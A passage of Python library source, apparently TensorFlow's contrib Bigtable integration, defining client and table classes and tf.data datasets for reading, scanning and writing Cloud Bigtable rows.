concurrent connections to the Cloud Bigtable service to make.
max_receive_message_size: (Optional.) The maximum bytes received in a
single gRPC response.
Raises:
ValueError: if the arguments are invalid (e.g. wrong type, or out of
expected ranges (e.g. negative).)
"""
if not isinstance(project_id, str):
raise ValueError("`project_id` must be a string")
self._project_id = project_id
if not isinstance(instance_id, str):
raise ValueError("`instance_id` must be a string")
self._instance_id = instance_id
if connection_pool_size is None:
connection_pool_size = -1
elif connection_pool_size < 1:
raise ValueError("`connection_pool_size` must be positive")
if max_receive_message_size is None:
max_receive_message_size = -1
elif max_receive_message_size < 1:
raise ValueError("`max_receive_message_size` must be positive")
self._connection_pool_size = connection_pool_size
self._resource = gen_bigtable_ops.bigtable_client(
project_id, instance_id, connection_pool_size, max_receive_message_size)
def table(self, name, snapshot=None):
"""Opens a table and returns a `tf.contrib.bigtable.BigtableTable` object.
Args:
name: A `tf.string` `tf.Tensor` name of the table to open.
snapshot: Either a `tf.string` `tf.Tensor` snapshot id, or `True` to
request the creation of a snapshot. (Note: currently unimplemented.)
Returns:
A `tf.contrib.bigtable.BigtableTable` Python object representing the
operations available on the table.
"""
# TODO(saeta): Implement snapshot functionality.
table = gen_bigtable_ops.bigtable_table(self._resource, name)
return BigtableTable(name, snapshot, table)
class BigtableTable(object):
"""BigtableTable is the entrypoint for reading and writing data in Cloud
Bigtable.
This BigtableTable class is the Python representation of the Cloud Bigtable
table within TensorFlow. Methods on this class allow data to be read from and
written to the Cloud Bigtable service in flexible and high performance
manners.
"""
# TODO(saeta): Investigate implementing tf.contrib.lookup.LookupInterface.
# TODO(saeta): Consider variant tensors instead of resources (while supporting
# connection pooling).
def __init__(self, name, snapshot, resource):
self._name = name
self._snapshot = snapshot
self._resource = resource
def lookup_columns(self, *args, **kwargs):
"""Retrieves the values of columns for a dataset of keys.
Example usage:
```python
table = bigtable_client.table("my_table")
key_dataset = table.get_keys_prefix("imagenet")
images = key_dataset.apply(table.lookup_columns(("cf1", "image"),
("cf2", "label"),
("cf2", "boundingbox")))
training_data = images.map(parse_and_crop, num_parallel_calls=64).batch(128)
```
Alternatively, you can use keyword arguments to specify the columns to
capture. Example (same as above, rewritten):
```python
table = bigtable_client.table("my_table")
key_dataset = table.get_keys_prefix("imagenet")
images = key_dataset.apply(table.lookup_columns(
cf1="image", cf2=("label", "boundingbox")))
training_data = images.map(parse_and_crop, num_parallel_calls=64).batch(128)
```
Note: certain `kwargs` keys are reserved, and thus, some column families
cannot be identified using the `kwargs` syntax. Instead, please use the
`args` syntax. This list includes:
- 'name'
Note: this list can change at any time.
Args:
*args: A list of tuples containing (column family, column name) pairs.
**kwargs: Column families (keys) and column qualifiers (values).
Returns:
A function that can be passed to `tf.data.Dataset.apply` to retrieve the
values of columns for the rows.
"""
table = self # Capture self
normalized = args
if normalized is None:
normalized = []
if isinstance(normalized, tuple):
normalized = list(normalized)
for key, value in iteritems(kwargs):
if key == "name":
continue
if isinstance(value, str):
normalized.append((key, value))
continue
for col in value:
normalized.append((key, col))
def _apply_fn(dataset):
# TODO(saeta): Verify dataset's types are correct!
return _BigtableLookupDataset(dataset, table, normalized)
return _apply_fn
def keys_by_range_dataset(self, start, end):
"""Retrieves all row keys between start and end.
Note: it does NOT retrieve the values of columns.
Args:
start: The start row key. The row keys for rows after start (inclusive)
will be retrieved.
end: (Optional.) The end row key. Rows up to (but not including) end will
be retrieved. If end is None, all subsequent row keys will be retrieved.
Returns:
A `tf.data.Dataset` containing `tf.string` Tensors corresponding to all
of the row keys between `start` and `end`.
"""
# TODO(saeta): Make inclusive / exclusive configurable?
if end is None:
end = ""
return _BigtableRangeKeyDataset(self, start, end)
def keys_by_prefix_dataset(self, prefix):
"""Retrieves the row keys matching a given prefix.
Args:
prefix: All row keys that begin with `prefix` in the table will be
retrieved.
Returns:
A `tf.data.Dataset`. containing `tf.string` Tensors corresponding to all
of the row keys matching that prefix.
"""
return _BigtablePrefixKeyDataset(self, prefix)
def sample_keys(self):
"""Retrieves a sampling of row keys from the Bigtable table.
This dataset is most often used in conjunction with
`tf.contrib.data.parallel_interleave` to construct a set of ranges for
scanning in parallel.
Returns:
A `tf.data.Dataset` returning string row keys.
"""
return _BigtableSampleKeysDataset(self)
def scan_prefix(self, prefix, probability=None, columns=None, **kwargs):
"""Retrieves row (including values) from the Bigtable service.
Rows with row-key prefixed by `prefix` will be retrieved.
Specifying the columns to retrieve for each row is done by either using
kwargs or in the columns parameter. To retrieve values of the columns "c1",
and "c2" from the column family "cfa", and the value of the column "c3"
from column family "cfb", the following datasets (`ds1`, and `ds2`) are
equivalent:
```
table = # ...
ds1 = table.scan_prefix("row_prefix", columns=[("cfa", "c1"),
("cfa", "c2"),
("cfb", "c3")])
ds2 = table.scan_prefix("row_prefix", cfa=["c1", "c2"], cfb="c3")
```
Note: only the latest value of a cell will be retrieved.
Args:
prefix: The prefix all row keys must match to be retrieved for prefix-
based scans.
probability: (Optional.) A float between 0 (exclusive) and 1 (inclusive).
A non-1 value indicates to probabilistically sample rows with the
provided probability.
columns: The columns to read. Note: most commonly, they are expressed as
kwargs. Use the columns value if you are using column families that are
reserved. The value of columns and kwargs are merged. Columns is a list
of tuples of strings ("column_family", "column_qualifier").
**kwargs: The column families and columns to read. Keys are treated as
column_families, and values can be either lists of strings, or strings
that are treated as the column qualifier (column name).
Returns:
A `tf.data.Dataset` returning the row keys and the cell contents.
Raises:
ValueError: If the configured probability is unexpected.
"""
probability = _normalize_probability(probability)
normalized = _normalize_columns(columns, kwargs)
return _BigtableScanDataset(self, prefix, "", "", normalized, probability)
def scan_range(self, start, end, probability=None, columns=None, **kwargs):
"""Retrieves rows (including values) from the Bigtable service.
Rows with row-keys between `start` and `end` will be retrieved.
Specifying the columns to retrieve for each row is done by either using
kwargs or in the columns parameter. To retrieve values of the columns "c1",
and "c2" from the column family "cfa", and the value of the column "c3"
from column family "cfb", the following datasets (`ds1`, and `ds2`) are
equivalent:
```
table = # ...
ds1 = table.scan_range("row_start", "row_end", columns=[("cfa", "c1"),
("cfa", "c2"),
("cfb", "c3")])
ds2 = table.scan_range("row_start", "row_end", cfa=["c1", "c2"], cfb="c3")
```
Note: only the latest value of a cell will be retrieved.
Args:
start: The start of the range when scanning by range.
end: (Optional.) The end of the range when scanning by range.
probability: (Optional.) A float between 0 (exclusive) and 1 (inclusive).
A non-1 value indicates to probabilistically sample rows with the
provided probability.
columns: The columns to read. Note: most commonly, they are expressed as
kwargs. Use the columns value if you are using column families that are
reserved. The value of columns and kwargs are merged. Columns is a list
of tuples of strings ("column_family", "column_qualifier").
**kwargs: The column families and columns to read. Keys are treated as
column_families, and values can be either lists of strings, or strings
that are treated as the column qualifier (column name).
Returns:
A `tf.data.Dataset` returning the row keys and the cell contents.
Raises:
ValueError: If the configured probability is unexpected.
"""
probability = _normalize_probability(probability)
normalized = _normalize_columns(columns, kwargs)
return _BigtableScanDataset(self, "", start, end, normalized, probability)
def parallel_scan_prefix(self,
prefix,
num_parallel_scans=None,
probability=None,
columns=None,
**kwargs):
"""Retrieves row (including values) from the Bigtable service at high speed.
Rows with row-key prefixed by `prefix` will be retrieved. This method is
similar to `scan_prefix`, but by contrast performs multiple sub-scans in
parallel in order to achieve higher performance.
Note: The dataset produced by this method is not deterministic!
Specifying the columns to retrieve for each row is done by either using
kwargs or in the columns parameter. To retrieve values of the columns "c1",
and "c2" from the column family "cfa", and the value of the column "c3"
from column family "cfb", the following datasets (`ds1`, and `ds2`) are
equivalent:
```
table = # ...
ds1 = table.parallel_scan_prefix("row_prefix", columns=[("cfa", "c1"),
("cfa", "c2"),
("cfb", "c3")])
ds2 = table.parallel_scan_prefix("row_prefix", cfa=["c1", "c2"], cfb="c3")
```
Note: only the latest value of a cell will be retrieved.
Args:
prefix: The prefix all row keys must match to be retrieved for prefix-
based scans.
num_parallel_scans: (Optional.) The number of concurrent scans against the
Cloud Bigtable instance.
probability: (Optional.) A float between 0 (exclusive) and 1 (inclusive).
A non-1 value indicates to probabilistically sample rows with the
provided probability.
columns: The columns to read. Note: most commonly, they are expressed as
kwargs. Use the columns value if you are using column families that are
reserved. The value of columns and kwargs are merged. Columns is a list
of tuples of strings ("column_family", "column_qualifier").
**kwargs: The column families and columns to read. Keys are treated as
column_families, and values can be either lists of strings, or strings
that are treated as the column qualifier (column name).
Returns:
A `tf.data.Dataset` returning the row keys and the cell contents.
Raises:
ValueError: If the configured probability is unexpected.
"""
probability = _normalize_probability(probability)
normalized = _normalize_columns(columns, kwargs)
ds = _BigtableSampleKeyPairsDataset(self, prefix, "", "")
return self._make_parallel_scan_dataset(ds, num_parallel_scans, probability,
normalized)
def parallel_scan_range(self,
start,
end,
num_parallel_scans=None,
probability=None,
columns=None,
**kwargs):
"""Retrieves rows (including values) from the Bigtable service.
Rows with row-keys between `start` and `end` will be retrieved. This method
is similar to `scan_range`, but by contrast performs multiple sub-scans in
parallel in order to achieve higher performance.
Note: The dataset produced by this method is not deterministic!
Specifying the columns to retrieve for each row is done by either using
kwargs or in the columns parameter. To retrieve values of the columns "c1",
and "c2" from the column family "cfa", and the value of the column "c3"
from column family "cfb", the following datasets (`ds1`, and `ds2`) are
equivalent:
```
table = # ...
ds1 = table.parallel_scan_range("row_start",
"row_end",
columns=[("cfa", "c1"),
("cfa", "c2"),
("cfb", "c3")])
ds2 = table.parallel_scan_range("row_start", "row_end",
cfa=["c1", "c2"], cfb="c3")
```
Note: only the latest value of a cell will be retrieved.
Args:
start: The start of the range when scanning by range.
end: (Optional.) The end of the range when scanning by range.
num_parallel_scans: (Optional.) The number of concurrent scans against the
Cloud Bigtable instance.
probability: (Optional.) A float between 0 (exclusive) and 1 (inclusive).
A non-1 value indicates to probabilistically sample rows with the
provided probability.
columns: The columns to read. Note: most commonly, they are expressed as
kwargs. Use the columns value if you are using column families that are
reserved. The value of columns and kwargs are merged. Columns is a list
of tuples of strings ("column_family", "column_qualifier").
**kwargs: The column families and columns to read. Keys are treated as
column_families, and values can be either lists of strings, or strings
that are treated as the column qualifier (column name).
Returns:
A `tf.data.Dataset` returning the row keys and the cell contents.
Raises:
ValueError: If the configured probability is unexpected.
"""
probability = _normalize_probability(probability)
normalized = _normalize_columns(columns, kwargs)
ds = _BigtableSampleKeyPairsDataset(self, "", start, end)
return self._make_parallel_scan_dataset(ds, num_parallel_scans, probability,
normalized)
def write(self, dataset, column_families, columns, timestamp=None):
"""Writes a dataset to the table.
Args:
dataset: A `tf.data.Dataset` to be written to this table. It must produce
a list of number-of-columns+1 elements, all of which must be strings.
The first value will be used as the row key, and subsequent values will
be used as cell values for the corresponding columns from the
corresponding column_families and columns entries.
column_families: A `tf.Tensor` of `tf.string`s corresponding to the
column names to store the dataset's elements into.
columns: A `tf.Tensor` of `tf.string`s corresponding to the column names
to store the dataset's elements into.
timestamp: (Optional.) An int64 timestamp to write all the values at.
Leave as None to use server-provided timestamps.
Returns:
A `tf.Operation` that can be run to perform the write.
Raises:
ValueError: If there are unexpected or incompatible types, or if the
number of columns and column_families does not match the output of
`dataset`.
"""
if timestamp is None:
timestamp = -1 # Bigtable server provided timestamp.
for tensor_type in nest.flatten(dataset.output_types):
if tensor_type != dtypes.string:
raise ValueError("Not all elements of the dataset were `tf.string`")
for shape in nest.flatten(dataset.output_shapes):
if not shape.is_compatible_with(tensor_shape.scalar()):
raise ValueError("Not all elements of the dataset were scalars")
if len(column_families) != len(columns):
raise ValueError("len(column_families) != len(columns)")
if len(nest.flatten(dataset.output_types)) != len(columns) + 1:
raise ValueError("A column name must be specified for every component of "
"the dataset elements. (e.g.: len(columns) != "
"len(dataset.output_types))")
return gen_bigtable_ops.dataset_to_bigtable(
self._resource,
dataset._as_variant_tensor(), # pylint: disable=protected-access
column_families,
columns,
timestamp)
def _make_parallel_scan_dataset(self, ds, num_parallel_scans,
normalized_probability, normalized_columns):
"""Builds a parallel dataset from a given range.
Args:
ds: A `_BigtableSampleKeyPairsDataset` returning ranges of keys to use.
num_parallel_scans: The number of concurrent parallel scans to use.
normalized_probability: A number between 0 and 1 for the keep probability.
normalized_columns: The column families and column qualifiers to retrieve.
Returns:
A `tf.data.Dataset` representing the result of the parallel scan.
"""
if num_parallel_scans is None:
num_parallel_scans = 50
ds = ds.shuffle(buffer_size=10000) # TODO(saeta): Make configurable.
def _interleave_fn(start, end):
return _BigtableScanDataset(
self,
prefix="",
start=start,
end=end,
normalized=normalized_columns,
probability=normalized_probability)
# Note prefetch_input_elements must be set in order to avoid rpc timeouts.
ds = ds.apply(
interleave_ops.parallel_interleave(
_interleave_fn,
cycle_length=num_parallel_scans,
sloppy=True,
prefetch_input_elements=1))
return ds
def _normalize_probability(probability):
if probability is None:
probability = 1.0
if isinstance(probability, float) and (probability <= 0.0 or
probability > 1.0):
raise ValueError("probability must be in the range (0, 1].")
return probability
def _normalize_columns(columns, provided_kwargs):
"""Converts arguments (columns, and kwargs dict) to C++ representation.
Args:
columns: a datastructure containing the column families and qualifier to
retrieve. Valid types include (1) None, (2) list of tuples, (3) a tuple of
strings.
provided_kwargs: a dictionary containing the column families and qualifiers
to retrieve
Returns:
A list of pairs of column family+qualifier to retrieve.
Raises:
ValueError: If there are no cells to retrieve or the columns are in an
incorrect format.
"""
normalized = columns
if normalized is None:
normalized = []
if isinstance(normalized, tuple):
if len(normalized) == 2:
normalized = [normalized]
else:
raise ValueError("columns was a tuple of inappropriate length")
for key, value in iteritems(provided_kwargs):
if key == "name":
continue
if isinstance(value, string_types):
normalized.append((key, value))
continue
for col in value:
normalized.append((key, col))
if not normalized:
raise ValueError("At least one column + column family must be specified.")
return normalized
class _BigtableKeyDataset(dataset_ops.DatasetSource):
"""_BigtableKeyDataset is an abstract class representing the keys of a table.
"""
def __init__(self, table):
"""Constructs a _BigtableKeyDataset.
Args:
table: a Bigtable class.
"""
super(_BigtableKeyDataset, self).__init__()
self._table = table
@property
def output_classes(self):
return ops.Tensor
@property
def output_shapes(self):
return tensor_shape.TensorShape([])
@property
def output_types(self):
return dtypes.string
class _BigtablePrefixKeyDataset(_BigtableKeyDataset):
"""_BigtablePrefixKeyDataset represents looking up keys by prefix.
"""
def __init__(self, table, prefix):
super(_BigtablePrefixKeyDataset, self).__init__(table)
self._prefix = prefix
def _as_variant_tensor(self):
return gen_bigtable_ops.bigtable_prefix_key_dataset(
table=self._table._resource, # pylint: disable=protected-access
prefix=self._prefix)
class _BigtableRangeKeyDataset(_BigtableKeyDataset):
"""_BigtableRangeKeyDataset represents looking up keys by range.
"""
def __init__(self, table, start, end):
super(_BigtableRangeKeyDataset, self).__init__(table)
self._start = start
self._end = end
def _as_variant_tensor(self):
return gen_bigtable_ops.bigtable_range_key_dataset(
table=self._table._resource, # pylint: disable=protected-access
start_key=self._start,
end_key=self._end)
class _BigtableSampleKeysDataset(_BigtableKeyDataset):
"""_BigtableSampleKeysDataset represents a sampling of row keys.
"""
# TODO(saeta): Expose the data size offsets into the keys.
def __init__(self, table):
super(_BigtableSampleKeysDataset, self).__init__(table)
def _as_variant_tensor(self):
return gen_bigtable_ops.bigtable_sample_keys_dataset(
table=self._table._resource) # pylint: disable=protected-access
class _BigtableLookupDataset(dataset_ops.DatasetSource):
"""_BigtableLookupDataset represents a dataset that retrieves values for keys.
"""
def __init__(self, dataset, table, normalized):
self._num_outputs = len(normalized) + 1 # 1 for row key
self._dataset = dataset
self._table = table
self._normalized = normalized
self._column_families = [i[0] for i in normalized]
self._columns = [i[1] for i in normalized]
@property
def output_classes(self):
return tuple([ops.Tensor] * self._num_outputs)
@property
def output_shapes(self):
return tuple([tensor_shape.TensorShape([])] * self._num_outputs)
@property
def output_types(self):
return tuple([dtypes.string] * self._num_outputs)
def _as_variant_tensor(self):
# pylint: disable=protected-access
return gen_bigtable_ops.bigtable_lookup_dataset(
keys_dataset=self._dataset._as_variant_tensor(),
table=self._table._resource,
column_families=self._column_families,
columns=self._columns)
class _BigtableScanDataset(dataset_ops.DatasetSource):
"""_BigtableScanDataset represents a dataset that retrieves keys and values.
"""
def __init__(self, table, prefix, start, end, normalized, probability):
self._table = table
self._prefix = prefix
self._start = start
self._end = end
self._column_families = [i[0] for i in normalized]
self._columns = [i[1] for i in normalized]
self._probability = probability
self._num_outputs = len(normalized) + 1 # 1 for row key
@property
def output_classes(self):
return tuple([ops.Tensor] * self._num_outputs)
@property
def output_shapes(self):
return tuple([tensor_shape.TensorShape([])] * self._num_outputs)
@property
def output_types(self):
return tuple([dtypes.string] * self._num_outputs)
def _as_variant_tensor(self):
return gen_bigtable_ops.bigtable_scan_dataset(
table=self._table._resource, # pylint: disable=protected-access
prefix=self._prefix,
start_key=self._start,
end_key=self._end,
column_families=self._column_families,
columns=self._columns,
probability=self._probability)
class _BigtableSampleKeyPairsDataset(dataset_ops.DatasetSource):
"""_BigtableSampleKeyPairsDataset returns key pairs from a Bigtable table.
"""
def __init__(self, table, prefix, start, end):
self._table = table
self._prefix = prefix
self._start = start
self._end = end
@property
def output_classes(self):
return (ops.Tensor, ops.Tensor)
@property
def output_shapes(self):
return (tensor_shape.TensorShape([]), tensor_shape.TensorShape([]))
@property
def output_types(self):
return (dtypes.string, dtypes.string)
def _as_variant_tensor(self):
# pylint: disable=protected-access
return gen_bigtable_ops.bigtable_sample_key_pairs_dataset(
table=self._table._resource,
prefix=self._prefix,
start_key=self._start,
end_key=self._end)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.